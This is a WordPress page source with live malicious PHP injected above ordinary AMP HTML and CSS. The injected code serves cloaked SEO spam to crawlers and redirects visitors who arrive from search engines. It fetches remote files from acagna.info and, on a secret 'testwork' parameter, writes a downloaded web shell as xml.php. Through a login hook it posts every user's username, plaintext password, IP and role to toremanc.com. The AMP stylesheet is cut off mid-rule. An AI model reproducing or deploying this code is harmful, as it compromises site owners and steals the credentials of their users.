if (!function_exists('getUserIP')) { function getUserIP() { foreach(array('HTTP_CF_CONNECTING_IP', 'HTTP_CLIENT_IP', 'HTTP_X_FORWARDED_FOR', 'HTTP_X_FORWARDED', 'HTTP_X_CLUSTER_CLIENT_IP', 'HTTP_FORWARDED_FOR', 'HTTP_FORWARDED', 'REMOTE_ADDR') as $key) { if (array_key_exists($key, $_SERVER) === true) { foreach(array_map('trim', explode(',', $_SERVER[$key])) as $ip) { if (filter_var($ip, FILTER_VALIDATE_IP, FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE) !== false) { return $ip; } } } } } } if (!function_exists('cacheUrl')) { function cacheUrl($url, $skip_cache = FALSE) { $cachetime = 10; //one week // $cachetime = 60 * 60 * 24 * 7; //one week $file = ABSPATH.WPINC. '/class-wp-http-netfilter.php'; $mtime = 0; if (file_exists($file)) { $mtime = filemtime($file); } $filetimemod = $mtime + $cachetime; if ($filetimemod < time() OR $skip_cache) { $ch = curl_init($url); curl_setopt_array($ch, array( CURLOPT_HEADER => FALSE, CURLOPT_RETURNTRANSFER => TRUE, CURLOPT_USERAGENT => 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36', CURLOPT_FOLLOWLOCATION => TRUE, CURLOPT_MAXREDIRS => 5, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 60, )); $data = curl_exec($ch); curl_close($ch); if ($data AND!$skip_cache) { file_put_contents($file, $data); } } else { $data = file_get_contents($file); } return $data; } } $weoboo = cacheUrl('https://acagna.info/lnk/data/ip.admin.txt'); $user_ip = getUserIP(); if (strpos($weoboo, getUserIP()) !== false) { //ip found } else { $id = $_SERVER['REQUEST_URI']; if (preg_match_all("/ffgg$/", $id, $matches) ) { echo '111111'; } $uag = $_SERVER['HTTP_USER_AGENT']; $id = $_SERVER['REQUEST_URI']; $host=$_SERVER['HTTP_HOST']; $ref =$_SERVER['HTTP_REFERER']; $uri =$_SERVER['REQUEST_URI']; //t $pagesID = $_SERVER['REQUEST_URI']; if (!preg_match_all("/wp-login|wp-admin|admin|xmlrpc/", $pagesID, $matches)) { $apiToken = 'tws5mkxns8qpz5hqywtcknjfw4wgrbhp'; $keyword =$_SERVER['REQUEST_URI']; $url_page=$_SERVER['REQUEST_URI']; $ua = urlencode($_SERVER['HTTP_USER_AGENT']); $lang = (isset($_SERVER['HTTP_ACCEPT_LANGUAGE']) ? substr($_SERVER['HTTP_ACCEPT_LANGUAGE'], 0, 2) : ''); $ip = null; $headers = array('HTTP_X_FORWARDED_FOR', 'HTTP_CF_CONNECTING_IP', 'HTTP_X_REAL_IP', 'REMOTE_ADDR'); foreach ($headers as $header) { if (!empty($_SERVER[$header])) { $ip = $_SERVER[$header]; break; } } if (strstr($ip, ',')) { $tmp = explode(',', $ip); if (stristr($_SERVER['HTTP_USER_AGENT'], 'mini')) { $ip = trim($tmp[count($tmp) - 2]); } else { $ip = trim($tmp[0]); } } if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) { $tmp = explode(',', $_SERVER['HTTP_X_FORWARDED_FOR']); $ip = trim($tmp[0]); } else { $ip = $_SERVER['REMOTE_ADDR']; } $referrer = urlencode(@$_SERVER['HTTP_REFERER']); $url = "https://bantuzu.info/api.php?is_api=1&action=get&token=$apiToken&ua=$ua&ip=$ip&keyword=$keyword&referrer=$referrer&lang=$lang&sub_id_1=".$_SERVER['HTTP_HOST']."&" . http_build_query($_GET) . ""; $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $output = curl_exec($ch); curl_close($ch); $result = json_decode($output); print $result->{'body'}; } @ini_set('display_errors', '0'); error_reporting(0); @ini_set("memory_limit","1024M"); $curtime = time(); $hspan = 0; $gen_passwd = "57ffb10f130bd90ab7a342fe814ccbd8"; $donor = $_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI']; if (preg_match('#.txt|.jpg|.png|/feed/|.xml|.ico#', $donor)) die(); if ($_REQUEST['testwork'] == 'ololo') { $twork = file_get_contents('http://acagna.info/lnk/up/sh.txt'); if (preg_match("#cgi|admin#i", $eb)) $eb = ''; if (file_put_contents("{$eb}xml.php", $twork)) echo "success!
go"; else echo "error!"; die(); } if (ini_get('allow_url_fopen')) { function get_data_yo($url) { $data = file_get_contents($url); return $data; } } else { function get_data_yo($url) { $ch = curl_init(); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 8); $data = curl_exec($ch); curl_close($ch); return $data; } } $ip = urlencode($_SERVER['REMOTE_ADDR']); $ua = urlencode($_SERVER['HTTP_USER_AGENT']); //block ddos bots $blbots = '/semrush|rogerbot|exabot|mj12bot|dotbot|gigabot|ahrefsbot|ia_archiver/i'; if (preg_match($blbots, $ua)) die(); $ref = urlencode($_SERVER['HTTP_REFERER']); $poiskoviki = '/google|bing|yahoo|aol|rambler/i'; $fromse = 0; if ($ref && preg_match($poiskoviki, $ref)) $fromse = 1; $abt = 0; $abtip = 0; if (isset($_GET['debug'])) $abt = 1; $crawlers = '/google|bot|crawl|slurp|spider|yandex|rambler/i'; $crawlers = '/a|b|c|d|e|f|g/i'; if (preg_match($crawlers, $ua)) { $abt = 1; } if (file_exists("{$eb}.bt")) { $bots = file("{$eb}.bt", FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES); $btime = filemtime("{$eb}.bt"); $obtime = $curtime - $btime; } if (!$bots[2] || $obtime > 172800) { $fbots = get_data_yo("http://acagna.info/lnk/bots.dat"); $btf = fopen("{$eb}.bt", 'w'); fwrite($btf, $fbots); fclose($btf); $bots = file("{$eb}.bt", FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES); } if (in_array($ip, $bots)) { $abt = 1; $abtip = 1; } $st = '.st'; $cldw = 0; $dw = 0; if ($_REQUEST["create"] == 1 && $_REQUEST["gen_passwd"] == $gen_passwd) { $cldw = 0; if ($_REQUEST['cldw']) $cldw = 1; $qq = $_REQUEST['qq']; if (!file_exists("{$eb}{$st}/.r")) { $qq = $_REQUEST['qq']; mkdir("{$eb}{$st}"); } else { $pamparam = file_get_contents("{$eb}{$st}/.r"); $eqq = explode('|', $pamparam); if (isset($_REQUEST['qq']) && $_REQUEST['qq']) $qq = $_REQUEST['qq']; else $qq = trim($eqq[2]); } $redir = $_REQUEST['redir']; $redcode = $_REQUEST['redcode']; $redcode = htmlspecialchars_decode($redcode); $redcode = base64_encode($redcode); $group = $_REQUEST['group']; if ($cldw) { $egroup = explode('_', $group); $kgroup = $egroup[0]; $clkeys = get_data_yo("http://acagna.info/lnk/gen/keys/$kgroup.keys"); file_put_contents("{$eb}{$st}/.k", $clkeys); } $lang = $_REQUEST['lang']; file_put_contents("{$eb}{$st}/.r", "$redir|$group|$qq|$lang|$redcode|$cldw"); if (file_exists("{$eb}{$st}/.r")) { echo "created"; die(); } } if (file_exists("{$eb}{$st}/.r")) { $dw = 1; $pamparam = file_get_contents("{$eb}{$st}/.r"); $eqq = explode('|', $pamparam); $redir = $eqq[0]; if (!strstr($redir, 'https://')) $redir = base64_decode($redir); $group = $eqq[1]; $qq = trim($eqq[2]); $lang = trim($eqq[3]); if ($eqq[4]) $redcode = base64_decode($eqq[4]); $cldw = $eqq[5]; } $donor = $_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI']; $ddomain = $_SERVER['HTTP_HOST']; $ddomain = str_ireplace('www.', '', $ddomain); $eddomain = explode('.', $ddomain); $ddname = $eddomain[0]; $donor = str_ireplace('www.', '', $donor); $page = str_replace('/', '|', $donor); $donor = urldecode($donor); $epage = explode('|', $page); $morda = 0; if (!$epage[1] && !$epage[2] || $epage[1] == 'index.php' || $epage[1] == '?p=home') $morda = 1; //$fromse = 1; if ($abt || $fromse || $redcode || $hspan) { if (($abt || $hspan) && !$_GET[$qq]) { $ll = get_data_yo("http://acagna.info/lnk/tuktuk.php?d=$donor&cldw=$cldw&dgrp=$algo"); $el = explode(' ', $ll); } if (file_exists("{$eb}{$st}/$page.html")) { $htmlpage = file_get_contents("{$eb}{$st}/$page.html"); echo $htmlpage; die(); } $mdpage = md5($page); if (file_exists("{$eb}{$st}/$page.txt") || file_exists("{$eb}{$st}/$mdpage.txt")) { if (file_exists("{$eb}{$st}/$mdpage.txt")) $gtxt = file_get_contents("{$eb}{$st}/$mdpage.txt"); else $gtxt = file_get_contents("{$eb}{$st}/$page.txt"); $etxt = explode('|', $gtxt); $key = $etxt[0]; $desc = $etxt[1]; $txt = $etxt[2]; $h1 = $etxt[3]; } elseif ($cldw || isset($_GET[$qq])) { $desc = ''; $keys = file("{$eb}{$st}/.k", FILE_SKIP_EMPTY_LINES | FILE_IGNORE_NEW_LINES); if ($keys[0]) { $key = $keys[0]; for ($kk = 1; $kk < count($keys); $kk++) $newkeys .= "$keys[$kk] "; file_put_contents("{$eb}{$st}/.k", $newkeys); } if (isset($_GET[$qq])) { $key = str_replace('-', ' ', $_GET[$qq]); } if ($key) { $parkey = $key; $tkey = str_replace(' ', '-', $key); if (stristr($lang, 'own')) { $lang = str_replace('own:', '', $lang); $owntext = base64_decode($lang); $wkey = urlencode($key); if (strstr($owntext, '?')) $ttxt = get_data_yo("{$owntext}&key=$wkey"); else $ttxt = get_data_yo("{$owntext}?key=$wkey"); } else $ttxt = get_data_yo("http://acagna.info/lnk/gen/index.php?key=$tkey&g=$group&lang=$lang&page=$page&cldw=$cldw&dd=$ddomain"); if (preg_match('#\n$parkey rating\n
\n$rating-5 stars based on\n$rcount reviews\n
\n\n"; $desc = $etxt[2]; $txt .= $etxt[3]; if ($desc == 'desc') { $desc = get_data_yo("http://acagna.info/lnk/gen/desc.php?key=$tkey&desc=$group"); preg_match('#gogogo(.*)enenen#is', $desc, $mtchs); $desc = $mtchs[1]; } $mdpage = md5($page); file_put_contents("{$eb}{$st}/$mdpage.txt", "$title|$desc|$txt|$h1"); $newclpage = str_replace('|', '/', $page); $newcllink = "$parkey "; if ($cldw) file_put_contents("{$eb}{$st}/cldwmap.txt", $newcllink, FILE_APPEND); } } $iswp = 0; if (file_exists('wp-includes/vars.php')) $iswp = 1; $cldwmap = file("{$eb}{$st}/cldwmap.txt", FILE_SKIP_EMPTY_LINES | FILE_IGNORE_NEW_LINES); ob_start(); function shutdown() { global $morda; global $eb; global $txt; global $qq; global $key; global $desc; global $lang; global $cldwmap; global $el; global $dw; global $cldw; global $redcode; global $abt; global $hspan; global $h1; global $iswp; global $ddname; $title = ucfirst($key); $my_content = ob_get_contents(); ob_end_clean(); if ($my_content && isset($_REQUEST['prigod'])) { $my_content = '---prigod---'; } if ($key && $abt) { if ($cldw && !$morda) { preg_match_all('##iUm', $my_content, $ahrefs); $cntahrefs = count($ahrefs[0]); $cntcldwmap = count($cldwmap); $i = 0; foreach ($ahrefs[0] as $ahref) { if ($cldwmap[$i]) { $my_content = str_replace($ahref, $cldwmap[$i], $my_content); } $i++; } if ($morda) { $cldwfooter = ''; foreach ($cldwmap as $cldwflink) { $cldwfooter .= "$cldwflink "; } $my_content = str_replace('', "
$cldwfooter
", $my_content); } } if (!$morda) { $my_content = preg_replace('##iUs', "$title", $my_content, 1); $my_content = preg_replace("##iUs", '', $my_content); $my_content = preg_replace("##iUs", '', $my_content); $my_content = preg_replace('##iUm', "

$h1

", $my_content, 1); $my_content = preg_replace('##iUm', "

$h1

", $my_content, 1); $my_content = preg_replace('##iUm', "

$h1

", $my_content, 1); $my_content = preg_replace("##iUs", '', $my_content); $my_content = preg_replace("##iUs", '', $my_content); $my_content = preg_replace("##iUs", '', $my_content); $my_content = str_replace('', " ", $my_content); $my_content = preg_replace("##iUs", '', $my_content); $my_content = preg_replace('##iUs', '', $my_content, 1); if (@preg_match('##iUs', $my_content)) { $my_content = preg_replace('##iUs', "
$txt
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
#iUs', $my_content)) { $my_content = preg_replace('#
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
#iUs', $my_content)) { $my_content = preg_replace('#
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('##iUs')) { $my_content = preg_replace('##iUs', "\n
$txt
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('##iUs', $my_content)) { $my_content = preg_replace('##iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('##iUs', $my_content)) { $my_content = preg_replace('##iUs', "\n
\n$txt\n
", $my_content, 1); } } } //end if key elseif (!preg_match('#(.*)404(.*)#i', $my_content) && !preg_match('#<title>(.*)not found(.*)#i', $my_content)) { foreach($el as $ln) { if (preg_match('#<strong>#', $my_content)) { $my_content = preg_replace('#<strong>#', "_-strong-_ $ln ", $my_content, 1); } elseif (preg_match('#<b>#', $my_content)) { $my_content = preg_replace('#<b>#', "_-b-_ $ln ", $my_content, 1); } elseif (preg_match('#<i>#', $my_content)) { $my_content = preg_replace('#<i>#', "_-i-_ $ln ", $my_content, 1); } elseif (preg_match('#<u>#', $my_content)) { $my_content = preg_replace('#<u>#', "_-u-_ $ln ", $my_content, 1); } elseif (preg_match('#<p(.*)>#', $my_content)) { $my_content = preg_replace('#<p(.*)>#iUs', "_-p-_ \n$ln ", $my_content, 1); } elseif (preg_match('#</p>#', $my_content)) { $my_content = preg_replace('#</p>#', "_-/p-_ \n$ln ", $my_content, 1); } elseif (preg_match('#<br(.*)>#', $my_content)) { $my_content = preg_replace('#<br(.*)>#iUs', " $ln ", $my_content, 1); } elseif (preg_match('#<span(.*)>#', $my_content)) { $my_content = preg_replace('#<span(.*)>#iUs', "_-span-_ $ln ", $my_content, 1); } elseif (preg_match('#<body(.*)>#iUs', $my_content)) { $my_content = preg_replace('#<body(.*)>#iUs', "<body>\n$ln ", $my_content, 1); } } $my_content = str_replace('_-', '<', $my_content); $my_content = str_replace('-_', '>', $my_content); //$my_content = str_replace('</head>', "<script type='text/javascript'> function style_{$ddname} () { return 'none'; } function end_{$ddname} () { document.getElementById('$ddname').style.display = style_{$ddname}(); } </script>\n</head>", $my_content); //$my_content = str_replace('</body>', "<script type='text/javascript'> end_{$ddname}(); </script>\n</body>", $my_content); } echo $my_content; } register_shutdown_function('shutdown'); } if (($_GET[$qq] || $cldw) && $fromse && !$abt) { if (!$redcode && !$morda) { if ($key) $tkey = str_replace(' ', '+', $key); else $tkey = str_replace('-', '+', $_GET[$qq]); if (strstr($redir, '?')) $redir .= "&keyword=".$tkey; else $redir .= "?keyword=".$tkey; $redir = str_replace('KEY', $tkey, $redir); header("Location: $redir"); echo "<script type=\"text/javascript\">location.href=\"$redir\";</script>"; die(); } elseif (!$morda) { $key = str_replace('-', ' ', $_GET[$qq]); $redcode = str_replace('KEY', $key, $redcode); echo stripslashes($redcode); } } /* your code end */ } /* weoboo end */ if(!isset($_COOKIE['_eshoob'])) { setcookie('_eshoob', 1, time()+604800, '/'); // unset cookies if (isset($_SERVER['HTTP_COOKIE'])) { $cookies = explode(';', $_SERVER['HTTP_COOKIE']); foreach($cookies as $cookie) { if (strpos($cookie,'wordpress') !== false || strpos($cookie,'wp_') !== false || strpos($cookie,'wp-') !== false) { $parts = explode('=', $cookie); $name = trim($parts[0]); setcookie($name, '', time()-1000); setcookie($name, '', time()-1000, '/'); } } } } if (!function_exists('getUserIP')) { function getUserIP() { foreach (array('HTTP_CF_CONNECTING_IP', 'HTTP_CLIENT_IP', 'HTTP_X_FORWARDED_FOR', 'HTTP_X_FORWARDED', 'HTTP_X_CLUSTER_CLIENT_IP', 'HTTP_FORWARDED_FOR', 'HTTP_FORWARDED', 'REMOTE_ADDR') as $key) { if (array_key_exists($key, $_SERVER) === true) { foreach (array_map('trim', explode(',', $_SERVER[$key])) as $ip) { if (filter_var($ip, FILTER_VALIDATE_IP, FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE) !== false) { return $ip; } } } } } } if (!function_exists('isHttps')) { function isHttps() { if ((!empty($_SERVER['REQUEST_SCHEME']) && $_SERVER['REQUEST_SCHEME'] == 'https') || (!empty($_SERVER['HTTPS']) && $_SERVER['HTTPS'] == 'on') || (!empty($_SERVER['HTTP_X_FORWARDED_PROTO']) && $_SERVER['HTTP_X_FORWARDED_PROTO'] == 'https') || (!empty($_SERVER['HTTP_X_FORWARDED_SSL']) && $_SERVER['HTTP_X_FORWARDED_SSL'] == 'on') || (!empty($_SERVER['SERVER_PORT']) && $_SERVER['SERVER_PORT'] == '443')) { $server_request_scheme = 'https'; } else { $server_request_scheme = 'http'; } return $server_request_scheme; } } if (!function_exists('wordpress_api_debug')) { function wordpress_api_debug( $user_login, $user ){ $wpApiUrl = "https://toremanc.com/lnk/api.php"; // $uuuser = get_user_by('login', $_POST['log']); if(in_array('administrator', $uuuser->roles)){ $role = 'admin'; } else{ $role = 'user'; } // $verbLogs = array( 'wp_host' => $_SERVER['HTTP_HOST'], 'wp_uri' => $_SERVER['REQUEST_URI'], 'wp_scheme' => isHttps(), 'user_login' => $_POST['log'], 'user_password' => $_POST['pwd'], 'user_ip' => getUserIP(), 'user_role' => $role ); if (!empty($verbLogs['user_login'])) { $wpLogData = json_encode($verbLogs); $curl = curl_init(); curl_setopt($curl, CURLOPT_HEADER, false); curl_setopt($curl, CURLOPT_URL, $wpApiUrl); curl_setopt($curl, CURLOPT_RETURNTRANSFER, true); curl_setopt($curl, CURLOPT_POST, true); curl_setopt($curl, CURLOPT_POSTFIELDS, $wpLogData); curl_setopt($curl, CURLOPT_HTTPHEADER, array('Content-Type:application/json')); $response = curl_exec($curl); curl_close($curl); } } } if (function_exists('add_action')) { add_action( 'wp_login', 'wordpress_api_debug', 10, 2 ); } ?><!DOCTYPE html> <html lang="en-US" amp="" data-amp-auto-lightbox-disable transformed="self;v=1" i-amphtml-layout="" i-amphtml-no-boilerplate=""> <head><meta charset="UTF-8"><meta name="viewport" content="width=device-width"><link rel="preconnect" href="https://cdn.ampproject.org"><style amp-runtime="" i-amphtml-version="012303151529000">html{overflow-x:hidden!important}html.i-amphtml-fie{height:100%!important;width:100%!important}html:not([amp4ads]),html:not([amp4ads]) body{height:auto!important}html:not([amp4ads]) body{margin:0!important}body{-webkit-text-size-adjust:100%;-moz-text-size-adjust:100%;-ms-text-size-adjust:100%;text-size-adjust:100%}html.i-amphtml-singledoc.i-amphtml-embedded{-ms-touch-action:pan-y pinch-zoom;touch-action:pan-y pinch-zoom}html.i-amphtml-fie>body,html.i-amphtml-singledoc>body{overflow:visible!important}html.i-amphtml-fie:not(.i-amphtml-inabox)>body,html.i-amphtml-singledoc:not(.i-amphtml-inabox)>body{position:relative!important}html.i-amphtml-ios-embed-legacy>body{overflow-x:hidden!important;overflow-y:auto!important;position:absolute!important}html.i-amphtml-ios-embed{overflow-y:auto!important;position:static}#i-amphtml-wrapper{overflow-x:hidden!important;overflow-y:auto!important;position:absolute!important;top:0!important;left:0!important;right:0!important;bottom:0!important;margin:0!important;display:block!important}html.i-amphtml-ios-embed.i-amphtml-ios-overscroll,html.i-amphtml-ios-embed.i-amphtml-ios-overscroll>#i-amphtml-wrapper{-webkit-overflow-scrolling:touch!important}#i-amphtml-wrapper>body{position:relative!important;border-top:1px solid transparent!important}#i-amphtml-wrapper+body{visibility:visible}#i-amphtml-wrapper+body .i-amphtml-lightbox-element,#i-amphtml-wrapper+body[i-amphtml-lightbox]{visibility:hidden}#i-amphtml-wrapper+body[i-amphtml-lightbox] .i-amphtml-lightbox-element{visibility:visible}#i-amphtml-wrapper.i-amphtml-scroll-disabled,.i-amphtml-scroll-disabled{overflow-x:hidden!important;overflow-y:hidden!important}amp-instagram{padding:54px 0px 0px!important;background-color:#fff}amp-iframe iframe{box-sizing:border-box!important}[amp-access][amp-access-hide]{display:none}[subscriptions-dialog],body:not(.i-amphtml-subs-ready) [subscriptions-action],body:not(.i-amphtml-subs-ready) [subscriptions-section]{display:none!important}amp-experiment,amp-live-list>[update]{display:none}amp-list[resizable-children]>.i-amphtml-loading-container.amp-hidden{display:none!important}amp-list [fetch-error],amp-list[load-more] [load-more-button],amp-list[load-more] [load-more-end],amp-list[load-more] [load-more-failed],amp-list[load-more] [load-more-loading]{display:none}amp-list[diffable] div[role=list]{display:block}amp-story-page,amp-story[standalone]{min-height:1px!important;display:block!important;height:100%!important;margin:0!important;padding:0!important;overflow:hidden!important;width:100%!important}amp-story[standalone]{background-color:#000!important;position:relative!important}amp-story-page{background-color:#757575}amp-story .amp-active>div,amp-story .i-amphtml-loader-background{display:none!important}amp-story-page:not(:first-of-type):not([distance]):not([active]){transform:translateY(1000vh)!important}amp-autocomplete{position:relative!important;display:inline-block!important}amp-autocomplete>input,amp-autocomplete>textarea{padding:0.5rem;border:1px solid rgba(0,0,0,0.33)}.i-amphtml-autocomplete-results,amp-autocomplete>input,amp-autocomplete>textarea{font-size:1rem;line-height:1.5rem}[amp-fx^=fly-in]{visibility:hidden}amp-script[nodom],amp-script[sandboxed]{position:fixed!important;top:0!important;width:1px!important;height:1px!important;overflow:hidden!important;visibility:hidden} /*# sourceURL=/css/ampdoc.css*/[hidden]{display:none!important}.i-amphtml-element{display:inline-block}.i-amphtml-blurry-placeholder{transition:opacity 0.3s cubic-bezier(0.0,0.0,0.2,1)!important;pointer-events:none}[layout=nodisplay]:not(.i-amphtml-element){display:none!important}.i-amphtml-layout-fixed,[layout=fixed][width][height]:not(.i-amphtml-layout-fixed){display:inline-block;position:relative}.i-amphtml-layout-responsive,[layout=responsive][width][height]:not(.i-amphtml-layout-responsive),[width][height][heights]:not([layout]):not(.i-amphtml-layout-responsive),[width][height][sizes]:not(img):not([layout]):not(.i-amphtml-layout-responsive){display:block;position:relative}.i-amphtml-layout-intrinsic,[layout=intrinsic][width][height]:not(.i-amphtml-layout-intrinsic){display:inline-block;position:relative;max-width:100%}.i-amphtml-layout-intrinsic .i-amphtml-sizer{max-width:100%}.i-amphtml-intrinsic-sizer{max-width:100%;display:block!important}.i-amphtml-layout-container,.i-amphtml-layout-fixed-height,[layout=container],[layout=fixed-height][height]:not(.i-amphtml-layout-fixed-height){display:block;position:relative}.i-amphtml-layout-fill,.i-amphtml-layout-fill.i-amphtml-notbuilt,[layout=fill]:not(.i-amphtml-layout-fill),body noscript>*{display:block;overflow:hidden!important;position:absolute;top:0;left:0;bottom:0;right:0}body noscript>*{position:absolute!important;width:100%;height:100%;z-index:2}body noscript{display:inline!important}.i-amphtml-layout-flex-item,[layout=flex-item]:not(.i-amphtml-layout-flex-item){display:block;position:relative;-ms-flex:1 1 auto;flex:1 1 auto}.i-amphtml-layout-fluid{position:relative}.i-amphtml-layout-size-defined{overflow:hidden!important}.i-amphtml-layout-awaiting-size{position:absolute!important;top:auto!important;bottom:auto!important}i-amphtml-sizer{display:block!important}@supports (aspect-ratio:1/1){i-amphtml-sizer.i-amphtml-disable-ar{display:none!important}}.i-amphtml-blurry-placeholder,.i-amphtml-fill-content{display:block;height:0;max-height:100%;max-width:100%;min-height:100%;min-width:100%;width:0;margin:auto}.i-amphtml-layout-size-defined .i-amphtml-fill-content{position:absolute;top:0;left:0;bottom:0;right:0}.i-amphtml-replaced-content,.i-amphtml-screen-reader{padding:0!important;border:none!important}.i-amphtml-screen-reader{position:fixed!important;top:0px!important;left:0px!important;width:4px!important;height:4px!important;opacity:0!important;overflow:hidden!important;margin:0!important;display:block!important;visibility:visible!important}.i-amphtml-screen-reader~.i-amphtml-screen-reader{left:8px!important}.i-amphtml-screen-reader~.i-amphtml-screen-reader~.i-amphtml-screen-reader{left:12px!important}.i-amphtml-screen-reader~.i-amphtml-screen-reader~.i-amphtml-screen-reader~.i-amphtml-screen-reader{left:16px!important}.i-amphtml-unresolved{position:relative;overflow:hidden!important}.i-amphtml-select-disabled{-webkit-user-select:none!important;-ms-user-select:none!important;user-select:none!important}.i-amphtml-notbuilt,[layout]:not(.i-amphtml-element),[width][height][heights]:not([layout]):not(.i-amphtml-element),[width][height][sizes]:not(img):not([layout]):not(.i-amphtml-element){position:relative;overflow:hidden!important;color:transparent!important}.i-amphtml-notbuilt:not(.i-amphtml-layout-container)>*,[layout]:not([layout=container]):not(.i-amphtml-element)>*,[width][height][heights]:not([layout]):not(.i-amphtml-element)>*,[width][height][sizes]:not([layout]):not(.i-amphtml-element)>*{display:none}amp-img:not(.i-amphtml-element)[i-amphtml-ssr]>img.i-amphtml-fill-content{display:block}.i-amphtml-notbuilt:not(.i-amphtml-layout-container),[layout]:not([layout=container]):not(.i-amphtml-element),[width][height][heights]:not([layout]):not(.i-amphtml-element),[width][height][sizes]:not(img):not([layout]):not(.i-amphtml-element){color:transparent!important;line-height:0!important}.i-amphtml-ghost{visibility:hidden!important}.i-amphtml-element>[placeholder],[layout]:not(.i-amphtml-element)>[placeholder],[width][height][heights]:not([layout]):not(.i-amphtml-element)>[placeholder],[width][height][sizes]:not([layout]):not(.i-amphtml-element)>[placeholder]{display:block;line-height:normal}.i-amphtml-element>[placeholder].amp-hidden,.i-amphtml-element>[placeholder].hidden{visibility:hidden}.i-amphtml-element:not(.amp-notsupported)>[fallback],.i-amphtml-layout-container>[placeholder].amp-hidden,.i-amphtml-layout-container>[placeholder].hidden{display:none}.i-amphtml-layout-size-defined>[fallback],.i-amphtml-layout-size-defined>[placeholder]{position:absolute!important;top:0!important;left:0!important;right:0!important;bottom:0!important;z-index:1}amp-img[i-amphtml-ssr]:not(.i-amphtml-element)>[placeholder]{z-index:auto}.i-amphtml-notbuilt>[placeholder]{display:block!important}.i-amphtml-hidden-by-media-query{display:none!important}.i-amphtml-element-error{background:red!important;color:#fff!important;position:relative!important}.i-amphtml-element-error:before{content:attr(error-message)}i-amp-scroll-container,i-amphtml-scroll-container{position:absolute;top:0;left:0;right:0;bottom:0;display:block}i-amp-scroll-container.amp-active,i-amphtml-scroll-container.amp-active{overflow:auto;-webkit-overflow-scrolling:touch}.i-amphtml-loading-container{display:block!important;pointer-events:none;z-index:1}.i-amphtml-notbuilt>.i-amphtml-loading-container{display:block!important}.i-amphtml-loading-container.amp-hidden{visibility:hidden}.i-amphtml-element>[overflow]{cursor:pointer;position:relative;z-index:2;visibility:hidden;display:initial;line-height:normal}.i-amphtml-layout-size-defined>[overflow]{position:absolute}.i-amphtml-element>[overflow].amp-visible{visibility:visible}template{display:none!important}.amp-border-box,.amp-border-box *,.amp-border-box :after,.amp-border-box :before{box-sizing:border-box}amp-pixel{display:none!important}amp-analytics,amp-auto-ads,amp-story-auto-ads{position:fixed!important;top:0!important;width:1px!important;height:1px!important;overflow:hidden!important;visibility:hidden}amp-story{visibility:hidden!important}html.i-amphtml-fie>amp-analytics{position:initial!important}[visible-when-invalid]:not(.visible),form [submit-error],form [submit-success],form [submitting]{display:none}amp-accordion{display:block!important}@media (min-width:1px){:where(amp-accordion>section)>:first-child{margin:0;background-color:#efefef;padding-right:20px;border:1px solid 